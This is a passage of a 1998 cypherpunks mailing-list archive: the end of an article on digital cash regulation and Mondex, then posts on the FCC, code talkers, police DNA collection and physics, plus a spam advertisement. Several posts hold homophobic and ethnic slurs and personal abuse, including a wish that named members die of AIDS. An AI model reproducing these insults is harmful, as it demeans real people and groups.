regular bank statements detailing his financial activities. But, that
having been said, a look at some representative regulations is important
for the purpose of understanding the political and legal barriers to the
creation of an anonymous digital cash system.

Digital cash is a balance sheet liability of the commercial banks or
companies that issue it. Does it thus fall under the laws governing
ordinary checking accounts? And what about discharge of debt? In the
case of the U.S., federal law does not currently address obligations
discharged by stored value cards--only those settled by cash, check, or
wire transfer.

FDIC deposit insurance, which applies to most bank deposits, can be
easily extended to stored value cards under the guise of a general
liability account. The FDIC General Counsel has issued an opinion [3]
that divides stored-value cards into four categories:

&middotBank Primary-Customer Account Systems--where funds stay in the
customer's account until they are transferred to a merchant or other
payee (as with a debit card). These are considered customer "deposits"
and covered by FDIC deposit insurance.

&middotBank Primary-Reserve Account Systems--where funds are downloaded
onto a customer's card (or software), and the bank's obligation is
transferred to a reserve or general liability account to pay merchants
and other payees. These are also considered issuer "deposits", and
covered by FDIC insurance.

&middotBank Secondary-Advance Systems--where a card issuer is a third
party, the bank makes the cards available to customers, and customers
pay the third party for the stored value using funds from their bank
account. The stored-value funds in this case are not considered
deposits, and are not covered.

&middotBank Secondary-Pre-Acquisition Systems--where the card is issued
by a third party, the bank pays the third party for the card value, and
subsequently sells the stored value to customers. Again, the
stored-value funds are not considered deposits, and are not covered.

Non-banks, meanwhile, are not eligible for FDIC deposit insurance. But
the question remains, If non-banks issue stored-value products, are
these stored-value funds "deposits"? For if stored-value is legally a
deposit, then federal and state regulators might attempt to deny a
company or other entity the right to issue the product, using the
Glass-Steagall Act or similar provisions.
If stored value-products are "deposits," then a non-bank might also
become subject to the jurisdiction of the Federal Trade Commission (12
U.S.C.A. 1831 t(e)) or might be treated as a bank for the purposes of
the Bank Holding Company Act (12 U.S.C.A. 1841 (c)(1)). This is
something to keep in mind before selecting Salt Lake City as your
digital cash base.
Nationally chartered banks are under the supervision of the Office of
Comptroller of the Currency (OCC). The OCC has explicitly approved
national bank participation in one digital cash system, Mondex, and in
stored value systems generally, stating "national banks may under 12
U.S.C. 24(Seventh) engage in the business of Mondex USA", and also that
"national banks may under 12 U.S.C. 24(Seventh) engage in the business
of operating a stored value system". [4]

In addition, the Federal Reserve has authorized bank-holding companies
who own ATM networks to provide stored-value card systems through these
networks.

A Closer Look at Mondex

Mondex is known as a stored value card system. "Stored value" simply
means the money is stored on a memory chip on the Mondex card instead
of, say, being stored as pieces of paper in your wallet. This "stored
value" will be used in everyday purchase and sale transactions just like
cash. Hence the chief function of the "stored value" is as a medium of
exchange (and not, as the name might imply, as intertemporal
savings--which is the usual meaning of the phrase "store of value" in
economic discussions of money).

The rights to Mondex are held by Mondex International Ltd., a U.K.
limited liability company. Fifty-one percent of Mondex International is
owned by MasterCard International, while a consortium of global banks
owns the other 49 percent. The U.S. rights to Mondex have been purchased
by a group of nationally-chartered U.S. banks, listed below.

These U.S. banks have in turn formed two Delaware limited liability
companies to operate Mondex. One of these two companies will act as a
bank. It will create, sell, and redeem the "electronically stored value"
(ESV) on Mondex cards. That is, it will trade other forms of U.S.
dollars for value stored on the Mondex card. It will issue (sell) ESV
for dollars, and it will redeem (buy back) ESV in exchange for dollars.
ESV is thus just another form of money: dollars, if denominated in
dollars; pounds, if denominated in pounds, and so on. From now on we
will simply call the Mondex ESV "Mondex Dollars".

The Delaware company acting as the bank is called an OLLC (Originator
Limited Liability Company). Its liabilities will be the Mondex Dollars
it issues against payment. The money the OLLC receives will be invested
in U.S. government securities, and cash and cash-equivalents such as
interbank deposits and overnight repurchase agreements. These are the
OLLC assets. The holdings of cash and cash-equivalents is required in
order to be able redeem Mondex Dollars on demand.

The second Delaware company will act as a licensing and servicing
entity. The equity in the two companies is divided up between Wells
Fargo (30 percent), Texas Commerce Bank (20 percent), First National
Bank of Chicago (10 percent), AT&T (10 percent), NOVUS (10 percent), and
MasterCard (10 percent).

In granting these nationally-chartered banks the right to operate a
subsidiary which carries out digital cash operations, the OCC applied
four criteria: (1) Is the operation related to banking? (2) Do the banks
have sufficient control to disallow non-banking activities? (3) Is the
banks' loss exposure limited? (4) Is the investment related to the
banks' ordinary banking business? Since the OCC determined that the
answers to these four questions were all "yes", it approved the Mondex
proposal.

Regulation E

The Federal Reserve's Regulation E implements the Electronic Fund
Transfer Act (EFTA). Under the guise of consumer protection, Regulation
E requires various disclosures related to electronic funds transfer, as
well as advance notice of changes in terms, transaction receipts,
periodic statements, error resolution procedures, limitations on
consumer liability, and restrictions on unsolicited giving of
funds-transfer access-devices to consumers. On May 2, 1996, the Federal
Reserve proposed to extend Regulation E to stored value cards. It would
classify stored-value systems as "on-line", "off-line accountable", or
"off-line unaccountable".

On-line systems would be simple debit cards where accounts balances are
stored in a central database, not on the card, and communication with
the central facility is required for balance transfers. Off-line
accountable systems are ones in which balances are recorded on the card,
transactions do not have to be transmitted to a central facility to be
pre-authorized, but where each transaction is stored and periodically
transmitted to a central facility. Off-line unaccountable systems are
those in which transactions are not pre-authorized, transactions are not
traceable to a particular card, and the card's value is only recorded on
the card itself.

The Fed proposes to make both on-line and off-line accountable systems
subject to Regulation E requirements on transaction receipts and dispute
resolutions if the maximum value that can be loaded is greater than
$100, but exempt if the maximum value is $100 or less. Off-line
unaccountable systems allowing values greater than $100 would be subject
to the Regulation E requirement on initial disclosure, but would be
totally exempt with respect to payment transactions. On-line systems
allowing values greater than $100 would have to meet all requirements of
Regulation E, except for periodic statements, provided an account
balance and account history is available on request.

The Fed's proposal would thus seem to eliminate on-line anonymous
systems (because of the transaction history requirement), but would
allow for off-line anonymous systems under the "off-line unaccountable"
option--as long as account withdrawals were recorded.

A digital cash system like Mondex, operating out of Delaware, has to
grapple with all these issues. This has the advantage that, having made
the regulators happy, the Mondex owners can then aggressively market
their product through all the usual banking and financial channels.

But those who are looking to create a digital cash product where privacy
and security are paramount will probably want to go off-shore and avoid
the regulators to a great extent. But they will still be left with the
more important, and practical, problem of making their customers happy.
And they will still be looking to recapture some of the central bank
seigniorage.

Click for a Menu of Other Digital Cash Articles by J. Orlin Grabbe

* * *

[1] Bank for International Settlements, Implications for Central Banks
of the Development of Electronic Money, Basle, October 1996.

[2] Glover, Paul, "Creating Ecological Economics with Local Currency",
undated manuscript. Glover's article contains a lot of grass-roots
socialism that I don't agree with. But that is not material to the use
of HOURS as an illustration of an alternative currency.

[3] Federal Deposit Insurance Corporation, "General Counsel's Opinion
No. 8--Stored Value Cards," by William F. Kroener, III, General Counsel,
FDIC, July 16, 1996.

[4] Office of the Comptroller of the Currency,
"Interpretations--Conditional Approval #220," published in
Interpretations and Actions, December 1996.

[30]




Back to Home Page

Quick Menu

Visit the Button Shop


- ------------------------------------------------------------------------
Interactive Forum
Digital Cash - Regulators

E-mail the Editor





- ------------------------------------------------------------------------


J. Orlin Grabbe
is one of the leading experts in the expanding area of financial data
encryption systems being developed for the new CyberEconomy.
He is also one of the world's leading experts on international finance.
His textbooks on the subject are ubiquitous in top universities
worldwide. No serious student of international finance is unaware of who
he is and what he has done.
He is a Harvard Ph.D. While a professor at Wharton, he trained many of
the top traders and derivatives experts as well as the "quants" who run
Wall Street's automated computer trading systems.
E-mail
- -----
Aloha, He'Ping,
Om, Shalom, Salaam.
Em Hotep, Peace Be,
All My Relations.
Adieu, Adios, Aloha.
Amen.
Roads End
Kris

=========================================================================
To subscribe to Conspiracy Theory Research List[CTRL] send email:
SUBSCRIBE CTRL [to:] LISTSERV@LISTSERV.AOL.COM

To UNsubscribe to Conspiracy Theory Research List[CTRL] send email:
SIGNOFF CTRL [to:] LISTSERV@LISTSERV.AOL.COM

Om

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 31 Jan 1998 05:15:39 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Chris Lewis's death?
In-Reply-To: <199801152323.SAA14920@panix2.panix.com>
Message-ID: <199801302059.VAA03267@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:

> >    vznuri@netcom.com   "Vladimir Z. Nuri" (nym for Dr. Dim)
> 
> You mean, Vlad is Larry Detweiler and Dmitri Vulis in the same time?
> Hmmm ...

Vlad is Detweiler, but Vulis is a different kook.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 31 Jan 1998 12:02:04 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: FCC want to unclog Internet [CNN]
Message-ID: <199801310401.WAA20675@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                 FCC CHIEF WANTS TO UNTANGLE INTERNET CONGESTION
>                                        
>      January 30, 1998
>      Web posted at: 6:59 p.m. EST (2359 GMT)
>      
>      WASHINGTON (AP) -- The nation's top telecommunications regulator
>      wants to help ease the world wide wait on the Internet.
>      
>      Federal Communications Commission Chairman Bill Kennard doesn't have
>      a plan yet but said Friday that he intends to start looking into
>      ways to give companies incentives to provide more high-speed
>      connections into homes. That would help ease congestion on the
>      Internet.
>      
>      "One issue that I'm particularly interested in is finding ways that
>      we can foster more investment in high-capacity bandwidth. I believe
>      that our nation will have an ever-increasing appetite for bandwidth
>      -- for high capacity data transmission capabilities," he told
>      reporters during a briefing on his top goals for the year.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <garbanzo@worldnet.att.net>
Date: Sat, 31 Jan 1998 12:33:53 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re: History of radio regulation; scrutiny of elected officials
Message-ID: <19980131042905.AAA4969@[12.67.34.192]>
MIME-Version: 1.0
Content-Type: text/plain




>
>Which gave us the predecessor of today's FCC. The question, of course, is
>if the justification for the FCC was to eliminate chaos, why did the
>agency not just stop there? Why the indecency rules, must-carry regs,
>fairness doctrine, overseeing network-station relationships, and so on?
>
>-Declan
>
This is the nature of regulatory agencies.  The FDA for example was 
originally just supposed to make sure that foods and drugs were labeled 
properly and did what they were supposed to do. Now it wants to ban 
cloning and tobacco.

> Decency, security, and liberty alike demand that
> government officials shall be subjected to the same
> rules of conduct that are commands to the citizens.
> In a government of laws, existence of the government
> will be imperilled if it fails observe the law
> scrupulously. Our government is the potent,
> omnipresent teacher. For good or ill, it teaches the
> whole people by example. Crime is contageous. If
> the government becomes a lawbreaker; it invites
> every man to become a law unto himself; it invites
> anarchy. To declare that in the administration of
> the criminal law the end justifies the means --
> to declare that the government may commit crimes
> to secure the conviction of a private criminal
> -- would bring terrible retribution. Against that
> pernicious doctrine this Court should resolutely
> set its face.
>
> Olmstead v. US (1928)
>
>You remember Brandeis. He's the person who argued for
>the *right* of privacy. Hardly a surprise, therefore,
>that he would be so outspoken on the abuse of government
>authority.
>
Jeez...expecting government officials to *obey* the *law*? Where do you 
think you live? So long as the economy is good you can do pretty much 
anything you want it seems.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 31 Jan 1998 17:26:38 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: Why This List Is A Security Risk
In-Reply-To: <1.5.4.32.19980131020517.00720848@pop.pipeline.com>
Message-ID: <3.0.5.32.19980130224619.00855500@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes was discussion out-of-band attacks on security systems,
such as providing the target's employees with opportunities for
"simultaneous employment" :-)   However, as the last part of
section (4) says, you've got to be careful of those suspicious
foreign cryptographers....

At 09:05 PM 1/30/98 -0500, John Young wrote:
>Setting policy on national security risk for the entire USG, 
>the DoD proclaims a trustworthy person does not engage in 
>the following:
>
>Sec. 147.14  Guideline L--Outside activities.
>
>    (a) The concern. Involvement in certain types of outside employment
>or activities is of security concern if it poses a conflict with an
>individual's security responsibilities and could create an increased risk of
>unauthorized disclosure of classified information.
>    (b) Conditions that could raise a security concern and may be
>disqualifying include any service, whether compensated, volunteer, or
>employment with: 
>    (1) A foreign country;
>    (2) Any foreign national;
>    (3) A representative of any foreign interest;
>    (4) Any foreign, domestic, or international organization or person
>engaged in analysis, discussion, or publication of material on
>intelligence, defense, foreign affairs, or protected technology.
>
>>From 32 CFR Part 147 published today.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Harland <foggy@gilligan.netisle.net>
Date: Sat, 31 Jan 1998 15:17:18 +0800
To: cypherpunks@toad.com
Subject: RIP, Carl Gorman, Code Talker
Message-ID: <Pine.LNX.3.95.980130231307.24853A-100000@gilligan.netisle.net>
MIME-Version: 1.0
Content-Type: text/plain



Mr. Carl Gorman, one of the few remaining Navajo 'Code-Talkers' of 
WWII fame, died yesterday of cancer at the age of 90. Along with
his fellow Navajo, he encrypted military voice communication by 
using his native language over the radio in the Great American 
Imperialist Struggle against the Great Japanese Imperialist
Initative.

Just a few thoughts:

- when asked why he helped America after all the abuse he took 
growing up as a Navajo, he basically said (my interpretation
here) he was fighting to protect the Navajo, not particularily
America, from the Japanese. A geographical dilemma.

- aside from the NSA sucking up everything in sight relating to
languages, doesn't Chomsky's theoretical 'Universal Syntax' (all
human languages have an identical fundamental syntax) negate the 
effectiveness of the Code-Talker approach in the long run? 

- on the other hand, the lovely ambiguities of natural language
would seem to be capable of effectively obscuring the meaning of
the message even if the plaintext were revealed. For example,
President Clinton's reference to 'blowjobs' not actually being
a sexual act. While the President is innocently asking a normal
person to provide him with a urgently needed act of personal 
hygiene, that person mistakingly would be thinking he wants oral 
sex. An effective obscuration of the Prez's message.

- now-a-days of course, if the shoe were on the other foot, the
Navy's NOSS satellite constellations would trianglate on the
radio signal and feed the coordinates to one of the TDRS sat-
ellites to target the crusie missles we just launched, effectively
ending the conversation prematurely without regard to syntax. 
[Sexy Hi-Tech Option]. Using radio for passing encrypted comm
seems to require a few non-traditional approaches. For example,
using a repeater system that would present the NOSS satellites
and any RDF equipment in the neighborhood with 'a thousand
points of...' RF energy - the 'needle-in-the-haystack' 
approach. The source would be difficult to find amongst its
many (presumedly cheap) clones.

Oh well. Good bye Carl. Thanks for the help. Sorry we were such
jerks. On the bright side - we're such third-rate fuckups it's
a sure thing the Navajo will out-live us if they just hang in
there a little bit longer. Your living to 90 was a fine 
example. Survival is always the best revenge.

-----------------------------------------------------------------
foggy@netisle.net                  lat:47d36'32" long:122d20'12"
"Rather perish than hate and fear, and twice rather perish than
make oneself hated and feared."                    -F. Nietzche-
-----------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Harland <foggy@gilligan.netisle.net>
Date: Sat, 31 Jan 1998 15:17:08 +0800
To: cypherpunks@toad.com
Subject: County Mounties Spit on the 4th Amendment
Message-ID: <Pine.LNX.3.95.980130231608.24853B-100000@gilligan.netisle.net>
MIME-Version: 1.0
Content-Type: text/plain




The Washington Post reported Jan. 30th that Prince George County (where 
dat?) police are collecting spit and fingerprints, not only from every 
suspect they interview in connection with the rape and murder of a nurse-
administrator, but also from all 400 male hospital employees at the hospital 
the victim formerly worked at.

The spit's for DNA testing and the fingerprints are just for the helluva
it I guess.

It's just a request mind you. If you refuse, you won't necessarily be con-
sidered a suspect but the information you supply 'would certainly be under
scrutiny' according to the Chief Thug of Prince George County.

Oh! The 4th amendment? That dusty old thing? When the scumbags are kicking
in your door which would you rather have protecting you: a raggedy old
piece of paper or a Prince George County Mountie SWAT team in full ninja
dress and the latest high-tech law-enforcement goodies? Thought so. Cup's
at the end of the counter comrade. Have a nice day. 

-----------------------------------------------------------------
foggy@netisle.net                  lat:47d36'32" long:122d20'12"
"Rather perish than hate and fear, and twice rather perish than
make oneself hated and feared."                    -F. Nietzche-
-----------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 31 Jan 1998 14:12:36 +0800
To: cypherpunks@toad.com
Subject: Re: History of radio regulation; scrutiny of elected officials
In-Reply-To: <Pine.GSO.3.95.980130183132.6873D-100000@well.com>
Message-ID: <cqP6Je10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Hey Declan,

Did *you* get a blow job from Monica Lewinski?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sat, 31 Jan 1998 08:28:27 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Interesting Chemical Reaction
Message-ID: <199801310015.BAA00313@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Wed, 28 Jan 1998 17:36:28 -0500
> From: ghio@temp0200.myriad.ml.org (Matthew Ghio)
> Subject: Re: Interesting Chemical Reaction

> Here's something to ponder:
> 
> Consider two objects initially at the same temperature.  One is at the
> focus of a hemispherical mirror.  An elliptical mirror with both objects
> at its foci encloses the remaining space.
> 
> Because of the spherical mirror, the first object reabsorbs most of its
> heat lost by radiation, but most of the second object's radiated heat is
> reflected upon the first.  Hence the first object becomes warmer relative
> to the second.
> 
> The entropy here appears to decrease, but according to thermodynamics that
> is impossible.  Can anyone explain how it is that the total entropy would
> not decrease?

Perpetual motion machines built on violations of thermodynamics involving
hemispherical and ellipsoidal mirrors have been around for years.  They
don't work.

The objects do not change temperature.

Trace a ray from each object.  In every direction, it hits an object which
is at exactly the same temperature as it is.  It may be itself, or it may
be the other object.  But in each case, the temperature is the same in all
directions.  The "sky" is the same temperature as the object, so it does
not change temperature.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 1 Feb 1998 05:53:32 +0800
To: Gary Harland <foggy@gilligan.netisle.net>
Subject: Re: County Mounties Spit on the 4th Amendment
In-Reply-To: <Pine.LNX.3.95.980130231608.24853B-100000@gilligan.netisle.net>
Message-ID: <Pine.BSF.3.91.980131023029.21234A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




Prince George's County, MD is east and north of Washington, DC. The PG 
County police have already earned a reputation for L.A.P.D.-style abuse 
of civil rights.

This case has been in the national news for days, now; PG Co. PD seems to 
have backed down, now that the ACLU has gotten involved.

-r.w.


On Fri, 30 Jan 1998, Gary Harland wrote:

> 
> The Washington Post reported Jan. 30th that Prince George County (where 
> dat?) police are collecting spit and fingerprints, not only from every 
> suspect they interview in connection with the rape and murder of a nurse-
> administrator, but also from all 400 male hospital employees at the hospital 
> the victim formerly worked at.
> 
> The spit's for DNA testing and the fingerprints are just for the helluva
> it I guess.
> 
> It's just a request mind you. If you refuse, you won't necessarily be con-
> sidered a suspect but the information you supply 'would certainly be under
> scrutiny' according to the Chief Thug of Prince George County.
> 
> Oh! The 4th amendment? That dusty old thing? When the scumbags are kicking
> in your door which would you rather have protecting you: a raggedy old
> piece of paper or a Prince George County Mountie SWAT team in full ninja
> dress and the latest high-tech law-enforcement goodies? Thought so. Cup's
> at the end of the counter comrade. Have a nice day. 
> 
> -----------------------------------------------------------------
> foggy@netisle.net                  lat:47d36'32" long:122d20'12"
> "Rather perish than hate and fear, and twice rather perish than
> make oneself hated and feared."                    -F. Nietzche-
> -----------------------------------------------------------------
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aurapro@earthlink.net
Date: Sat, 31 Jan 1998 22:43:47 +0800
To: cypherpunks@toad.com
Subject: Electric Utility De-Regulation
Message-ID: <199801311435.GAA22793@iceland.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi !

January 1st was the official launch of the most powerful           
business opportunity in the history of networking.

Here's your chance to get in on the ground floor and sieze an 
opportunity to take advantage of electric utility deregulation and
realize some of those dreams you've been dreaming.

When the telephone industry deregulated, millionares were made. 
At $215 Billion as an industry, Electric Utilities is 10 TIMES
the opportunity that long distance telephone was.

Don't delay! Get started now! We will provide full training and
support. You are up and running within 48 hours - and low, low
start-up costs! This IS the big one. You will have access to 
our advanced technology to help build your business because 
it is all in house as well as a generic website for you and all of
those in your group!  

E-mail inquiries only - please leave your phone number and time to
call (or call me) 

 E-mail to: Electrifyme@juno.com
   
OPPORTUNITIES ARE NEVER LOST .....
            ........JUST FOUND BY SOMEONE ELSE !!


Thanks for your time, 


John
(413) 736-2442 


///////////////////////////////////////////////////////////////////////////////
This Message was Composed using Extractor Pro Bulk E- Mail Software. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.
////////////////////////////////////////////////////////////////////////////////






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 31 Jan 1998 14:12:33 +0800
To: cypherpunks@toad.com
Subject: Secure checksums
Message-ID: <199801310605.HAA14285@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Timmy May sits at his terminal dressed in five-inch 
stiletto heels, fishnet stockings, a gold-lame 
mini-skirt, a purple halter with girdle underneath to 
keep in his flabby gut, a Fredericks of Hollywood 
padded bra also underneath the halter, a cheap Naomi 
Sims pink afro wig, waiting to yank his crank whenever 
a black man responds to one of his inane rants.

        o   \ o /  _ o         __|    \ /     |__        o _  \ o /   o
       /|\    |     /\   ___\o   \o    |    o/    o/__   /\     |    /|\ Timmy May
       / \   / \   | \  /)  |    ( \  /o\  / )    |  (\  / |   / \   / \





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Uhh...this is Joe [Randall Farmer]" <rfarmer@HiWAAY.net>
Date: Sun, 1 Feb 1998 00:23:48 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Predicting cipher life / NSA rigged DES? ...
In-Reply-To: <v03102800b0f8369ddc5d@[207.167.93.63]>
Message-ID: <Pine.OSF.3.96.980130211527.28798B-100000@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain



> I had tended to not take too seriously the posts of someone who signs himself
> as "Uhh...this is Joe," 

That was probably a good idea.

> but the reasoning he displays below makes me take him more seriously: 

Ooh, bad move! :)

> ...the amount of time should be replaced by "effort expended." 

That was what I meant, although my wording of it was sort of ambiguous; "years
of analysis," "analysis-hours," etc. refer to the time the cryptographers
actually spent on studying the cipher, not the time elapsed since the cipher's
release. 

[...]  
> 
> --Tim May 
> 
> 
> The Feds have shown their hand: they want a ban on domestic cryptography 
> ---------:---------:---------:---------:---------:---------:---------:---- 
> Timothy C. May              | Crypto Anarchy: encryption, digital money, 
> ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero 
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets, 
> Higher Power: 2^2,976,221   | black markets, collapse of governments.  
> "National borders aren't even speed bumps on the information superhighway." 

---------------------------------------------------------------------------
Randall Farmer
    rfarmer@hiwaay.net
    http://hiwaay.net/~rfarmer














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 1 Feb 1998 02:34:49 +0800
To: cypherpunks@cyberpass.net
Subject: Re: RIP, Carl Gorman, Code Talker
In-Reply-To: <Pine.LNX.3.95.980130231307.24853A-100000@gilligan.netisle.net>
Message-ID: <v03102800b0f91bdb5a27@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



(As Gary seems to be a newcomer, let me remind him and others that
"cypherpunks@toad.com" is not the place to send messages to the list.
Please use one of the distributed addresses.  It's been a year since the
list moved off of toad.com. I wish John would just start bouncing messages
sent to toad.com and be done with it.)


At 11:16 PM -0800 1/30/98, Gary Harland wrote:

>- when asked why he helped America after all the abuse he took
>growing up as a Navajo, he basically said (my interpretation
>here) he was fighting to protect the Navajo, not particularily
>America, from the Japanese. A geographical dilemma.

Never understimate the power of blind chauvinistic patriotism. Killing Japs
was the honorable thing to do, even for Injuns.


>- aside from the NSA sucking up everything in sight relating to
>languages, doesn't Chomsky's theoretical 'Universal Syntax' (all
>human languages have an identical fundamental syntax) negate the
>effectiveness of the Code-Talker approach in the long run?

"All crypto is economics." One doesn't have to jump to theoretical mumbo
jumbo about a putative "identical fundamental syntax" to know that the
Navajo code talkers were not using an unbreakable system.

But what mattered is that, for the level of security needed on the
battlefield, the system was "essentially secure" against Japanese
translation. Sure, in time the Japanese could have found some experts on
Navajo, could have trained their own code talker translators, etc. But they
didn't have this time. (And if we posit "enough time," then the U.S.
military would have had enough time to drop the Navajo code talkers and
replace them with Ebonics code talkers. Dat be da jive, mo fo.)

"All crypto is economics."

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sat, 31 Jan 1998 18:40:54 +0800
To: cypherpunks@cyberpass.net
Subject: stupid test (virus warning)
Message-ID: <199801311025.LAA09936@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> .... you get an email from .ru address, with small .com file attached.
> .... you think: "I shall run it!"
>
> .... you flunk.
>
>
>DUUUUHHHH.
>Hey, Mr. Lame .ru: give it up.

The same could be said about anybody who actually thinks DOS/Windows
machines have any semblence of security what so ever.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 1 Feb 1998 03:11:13 +0800
To: cypherpunks@toad.com
Subject: Dr Dobbs crypto CD
Message-ID: <kPL7Je15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



The DDJ I just got (March 98) has a full-page ad for the crypto CD (p.113)
saying inter alia "New Release! fast Search Engine"

Has anyone received even the "old release"?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 1 Feb 1998 03:50:45 +0800
To: cypherpunks@toad.com
Subject: Re: RIP, Carl Gorman, Code Talker
In-Reply-To: <v03102800b0f91bdb5a27@[207.167.93.63]>
Message-ID: <mPR7Je1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:

> (As Gary seems to be a newcomer, let me remind him and others that
> "cypherpunks@toad.com" is not the place to send messages to the list.
> Please use one of the distributed addresses.  It's been a year since the
> list moved off of toad.com. I wish John would just start bouncing messages
> sent to toad.com and be done with it.)

When are cocksuckers John Gilmore and Guy Polis planning to die from AIDS?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 1 Feb 1998 06:21:54 +0800
To: cypherpunks@cyberpass.net
Subject: Feb. 6 column -- Where to start
Message-ID: <v04003a0ab0f938c29dc6@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Sat, 31 Jan 1998 02:08:34 -0700
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
Date: Sat, 31 Jan 1998 01:09:30 -0800
To: cathy@engr.colostate.edu
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Feb. 6 column -- Where to start
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/430
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED FEB. 6, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    Getting started

    S.J. writes from Johns Hopkins:

  "Vin -- I have found and enjoyed your web page
(http://www.nguworld.com/vindex/). I am also recently reading David Boaz's
book "Libertarianism: A Primer." I have been accused by professors of being
a Libertarian. I really was not sure what one was. Thus my recent readings.
I have many questions and no one to dialogue with. If you have time, could
you tell me places I may check here in Washington D.C. ..."

   Egon, whose locale I don't know, similarly inquires:

  "... Incidently, I both enjoy and dread (reading your columns.) So few
people realize how this country was intended. There is no other country in
which the citizens are "sovereign," with all the rights of a king reserved
to the people. But at the same time, the government has craftily changed
things around. And so, the real question:  Can you point me in a direction
to information about how to help address these issues, or people to talk to
about them?"

    #  #  #

  Since informing others must always start with informing ourselves, I
suggested that both fellows they lay hands on a couple of recent catalogs
from Laissez Faire Books, 938 Howard St., Suite 202, San Francisco 94103;
tel. 415-541-9780; e-mail orders to orders@laissezfaire.org.

  Beginners may want to look for Thomas Szasz, Burton Folsom, Albert J.
Nock, John Taylor Gatto, and Ayn Rand. Laissez Faire now lists L. Neil
